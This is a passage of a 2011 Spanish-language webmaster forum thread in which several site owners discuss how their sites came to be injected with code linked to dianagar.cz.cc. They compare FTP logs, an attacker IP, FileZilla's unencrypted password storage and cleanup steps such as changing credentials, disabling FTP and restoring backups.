tbn han entrado la noche pasada en mi hotmail, y han leido y desechado algunos de mis emails a la papelera ,supongo que buscando información, asi que yo pienso más en algún tipo de keyloguer...
Lo de hotmail ya es mas raro, yo no he notado nada y ya no seria un ataque hacia cuentas de servidores FTP, seria algo mas serio... eso de buscar informacion en tu correo es aun mas grave. A ver si va a ser otra cosa y no tiene relacion.

El codigo insertado esta claro que lo inserta algun tipo de "robot", porque es imposible que una persona fisica meta ese codigo en tanta web.

Yo sigo sospechando que tiene que ser algun ataque hacia el servidor y no tanto en nuestros ordenadores locales por que yo e analizado mi PC con varios antivirus y no han encontrado nada, algun falso positivo, pero se a ciencia cierta 100% que es falso positivo y del software que tengo instalado lo llevo instalado desde hace años... menos un programita nuevo que me pone botones extra en las ventanas de windows con nuevas funciones, pero no lo consideraria un programa sospechoso.

Mis logs de 1&1 tambien solo me muestra las conexiones http pero no las FTP al menos que yo sepa, por lo tanto, tampoco puedo saber quien y cuantas veces conecto.

Con google analitics, me e fijado que el dia 11 de enero las visitias subieron bastante, pero no se si tendra algo que ver.

Yo no me quedo tranquilo, porque esto puede volver a pasar si no sabemos de donde proviene y somos demasiados para que sea un virus y que nadie haya notado nada no? O algun programa que tengamos instalado tiene una falla de seguridad...

... a ver si va a ser el filezilla... ¿lo usais?... por sospechar que no quede xD
  #19 (permalink)  
Antiguo 01/02/2011, 07:33
 
Fecha de Ingreso: diciembre-2010
Mensajes: 11
Antigüedad: 14 años
Puntos: 0
Respuesta: Pagina web infectada con dianagar.cz.cc ?!

a mi me lleva pasando esto varios días. he cambiado las contraseñas 2 veces y a ver si ya por fin para el acoso.
  #20 (permalink)  
Antiguo 01/02/2011, 09:38
 
Fecha de Ingreso: diciembre-2010
Mensajes: 11
Antigüedad: 14 años
Puntos: 0
Respuesta: Pagina web infectada con dianagar.cz.cc ?!

Ni así, una contraseña de 8 caracteres y en menos de 1 hora ya la han pirateado.
  #21 (permalink)  
Antiguo 01/02/2011, 09:41
Avatar de mayid
Colaborador
 
Fecha de Ingreso: marzo-2009
Ubicación: BsAs
Mensajes: 4.014
Antigüedad: 15 años, 8 meses
Puntos: 101
Respuesta: Pagina web infectada con dianagar.cz.cc ?!

Que contraseña estas cambiando? La del FTP? Que tal si cambias la del hosting tambien?

Recordá escribirle a tu proveedor de hosting, y cuando tengas tiempo también inscribir tu sitio en google webmaster tools.

Se me ocurre que te estan haciendo pishing en el navegador? Por que no corres un programa como SuperAntiSpyware a ver que te detecta?
  #22 (permalink)  
Antiguo 01/02/2011, 10:10
Avatar de ArturoGallegos
Moderador
 
Fecha de Ingreso: febrero-2008
Ubicación: Morelia, México
Mensajes: 6.774
Antigüedad: 16 años, 9 meses
Puntos: 1146
Respuesta: Pagina web infectada con dianagar.cz.cc ?!

Cita:
Iniciado por Anel87 Ver Mensaje
Ni así, una contraseña de 8 caracteres y en menos de 1 hora ya la han pirateado.
1.- procede primero a limpiar tu computadora, usa una recien formateada o mejor a un usa un cd live de linux y cambia la cave
2.- no compartas la clave con nadie y si accesas tu... Repito una pc limpia o desde un linux
3.- que es para ti una clave segura? Por ejemplo mis cuentas ftp tenen claves como esta Od56#*awJf91/*
Eso amigo mi es una clave fuerte... (aunque no imposible de hackear)
  #23 (permalink)  
Antiguo 01/02/2011, 10:11
 
Fecha de Ingreso: diciembre-2010
Mensajes: 11
Antigüedad: 14 años
Puntos: 0
Respuesta: Pagina web infectada con dianagar.cz.cc ?!

Cita:
Iniciado por mayid Ver Mensaje
Que contraseña estas cambiando? La del FTP? Que tal si cambias la del hosting tambien?

Recordá escribirle a tu proveedor de hosting, y cuando tengas tiempo también inscribir tu sitio en google webmaster tools.

Se me ocurre que te estan haciendo pishing en el navegador? Por que no corres un programa como SuperAntiSpyware a ver que te detecta?

He cambiado la contraseña del hosting y del ftp por contraseñas totalmente aleatorias.

Estoy inscrito en google webmaster tools (y dice que no me detecta software malicioso) y tengo un antivirus pagado G data internetsecurity (que estos últimos días lo paso 2 veces al día).


Lo que he hecho ahora es bloquear cualquier opción de entrar via ftp. A ver si así.
  #24 (permalink)  
Antiguo 01/02/2011, 14:27
Avatar de juanolo  
Fecha de Ingreso: abril-2008
Mensajes: 251
Antigüedad: 16 años, 8 meses
Puntos: 5
Respuesta: Pagina web infectada con dianagar.cz.cc ?!

Cita:
Iniciado por Anel87 Ver Mensaje
He cambiado la contraseña del hosting y del ftp por contraseñas totalmente aleatorias.

Estoy inscrito en google webmaster tools (y dice que no me detecta software malicioso) y tengo un antivirus pagado G data internetsecurity (que estos últimos días lo paso 2 veces al día).


Lo que he hecho ahora es bloquear cualquier opción de entrar via ftp. A ver si así.
Pues si que te esta siendo resistente.

Yo busque virus en mi ordenador con 3 antivirus diferentes y nada, solo algun que otro falso positivo. Le pase Spybot - Search & Destroy y nada, tampoco encontro nada. Cambie la contraseña del FTP y de momento estan aguantando.

Seguimos sin saber de donde viene la infeccion, yo lo veo algo grave no saberlo, un virus comun lo dudo... no se.
  #25 (permalink)  
Antiguo 01/02/2011, 14:47
Avatar de mayid
Colaborador
 
Fecha de Ingreso: marzo-2009
Ubicación: BsAs
Mensajes: 4.014
Antigüedad: 15 años, 8 meses
Puntos: 101
Respuesta: Pagina web infectada con dianagar.cz.cc ?!

Yo tampoco encontré virus/malware. Pasé Malware'sbytes-AntiMalware. Pero comparto la cuenta con otra persona.

Los del hosting no contestaron nada. Pero tuvimos solo un sitio infectado de varios alojados.

@Anel87: es muy severo lo que te pasa. Posteaste en foros especializados de malware?
  #26 (permalink)  
Antiguo 01/02/2011, 19:33
 
Fecha de Ingreso: enero-2011
Mensajes: 4
Antigüedad: 13 años, 10 meses
Puntos: 0
Respuesta: Pagina web infectada con dianagar.cz.cc ?!

A mi de pronto me han pasado los logs del día del ataque y está claro que entran sabiendo la contraseña...
1- un primero logueo y listado del raiz desde la ip atacante
2- un segundo acceso desde el propio localhost (mi proveedor me dice que es normal que es de un proceso del sistema, pero me parece raro que entren con el usuario y que seguido hagan un quit
3- el acceso desde la ip que ataco pero para realizar el ataque

Por cierto, la ip en mi caso ha sido 85.25.84.214

Todo pinta a que es alguna movida que tenemos en nuestros equipos pero que han esperado a realizar el ataque. Podría estar bien que comentaramos qué programas tenemos instalados y si en alguna ocasión hemos hecho uso de algún crack etc para ellos que haya podido instalar un keylogger o similar en nuestras máquinas.
  #27 (permalink)  
Antiguo 02/02/2011, 14:13
 
Fecha de Ingreso: febrero-2011
Mensajes: 2
Antigüedad: 13 años, 10 meses
Puntos: 0
Respuesta: Pagina web infectada con dianagar.cz.cc ?!

A mi tambien me ha pasado con un servidor Moodle.

He mirado los logs y puedo confirmar que han accedido mediante FTP y han modificado , (con el codigo descrito arriba) todas las páginas index.php (mas de 70) y los archivos footer.html y header.html.

Tambien desde la IP 85.25.84.214

Toca tirar de la copia de seguridad ( si la tienes...).

Tambien he parado el servicio FTP en el servidor a ver si asi no vuelven a entrar.
  #28 (permalink)  
Antiguo 02/02/2011, 14:17
Avatar de mayid
Colaborador
 
Fecha de Ingreso: marzo-2009
Ubicación: BsAs
Mensajes: 4.014
Antigüedad: 15 años, 8 meses
Puntos: 101
Respuesta: Pagina web infectada con dianagar.cz.cc ?!

Yo no tuve acceso al log así que no se. Pero hay que denunciar esa ip. Yo lo que hice hace unos dias fue entrar a cz.cc y enviar un mensaje a la seccion de span, sobre dianagar.cz.cc, explicando brevemente de que se trata. Si se suman, mejor.
  #29 (permalink)  
Antiguo 03/02/2011, 04:36
Avatar de juanolo  
Fecha de Ingreso: abril-2008
Mensajes: 251
Antigüedad: 16 años, 8 meses
Puntos: 5
Exclamación Respuesta: Pagina web infectada con dianagar.cz.cc ?!

Cita:
Iniciado por piku Ver Mensaje
Podría estar bien que comentaramos qué programas tenemos instalados y si en alguna ocasión hemos hecho uso de algún crack etc para ellos que haya podido instalar un keylogger o similar en nuestras máquinas.
Voto por ello, yo nombro algun programa que e instalado hace poco, o que me parezca importante o sospechoso...

- xtrabuttons (añade botones extra a las ventanas de windows, a veces da error, sopongo q porque es beta).
- Filezilla: es mi cliente FTP, normalmente grabo el nombre de usuario y contraseña del servidor para no tenerla que escribir constantemente. Lo malo de este cliente es que guarda las contraseñas en un .xml sin encriptar. Si tenemos un virus, posiblemente haya cogido ese fichero si usamos filezilla. Gran pregunta ¿Usais filezilla u otro que no encripte las contraseñas y guardais las contraseñas en vuestro cliente FTP? (por ahi puede venir el problema) yo lo hacia y mira. Ahora mejor usar WinSCP que las guarda de mejor forma o incluso no darle a recordar contraseña, aunque a mi se me desconecta cada dos por tres y es insufrible este cliente... asique si alguien me recomienda otro FTP SEGURO que no guarde las claves a pelo os lo agradeceria.
- Avast antivirus como residente.
- Firefox, Crhome, Opera, IE, Safari e IEtester como navegadores instalados.
- HP USB Disk Storage Format Tool: para formatear un pendrive que no me dejaba.
- SwishMax Portable.
- NetLimiter para bajar la velocidad de mi conexion
- Windows 7 Ultimate como SO habitual.
- Hace tiempo un amigo me paso desde su ordenador MAC un ZIP con un .exe que le aparecia automaticamente en su pendrive al enchufarlo. Abri el ZIP sin descomprimirlo y no aparecia el exe en mi PC aunque en su MAC si. Pero nunca llegue a jecutar nada, ni a descomprimir nada puesto que no habia nada. A parte que ningun antivirus a detectado nada, porque no habia exe.

Y cracks nose, hace tempo para un need for speed pero cracks no suelo usar y menos recientes, solo serials.

Última edición por juanolo; 03/02/2011 a las 04:53
  #30 (permalink)  
Antiguo 03/02/2011, 06:34
Avatar de mayid
Colaborador
 
Fecha de Ingreso: marzo-2009
Ubicación: BsAs
Mensajes: 4.014
Antigüedad: 15 años, 8 meses
Puntos: 101
Respuesta: Pagina web infectada con dianagar.cz.cc ?!

En mi caso, uso Filezilla. No sabía que guardara las constraseñas así.
Y uso esos vanegadores, claro.

Etiquetas: Ninguno
Atención: Estás leyendo un tema que no tiene actividad desde hace más de 6 MESES, te recomendamos abrir un Nuevo tema en lugar de responder al actual.
Respuesta

SíEste tema le ha gustado a 2 personas




La zona horaria es GMT -6. Ahora son las 23:43.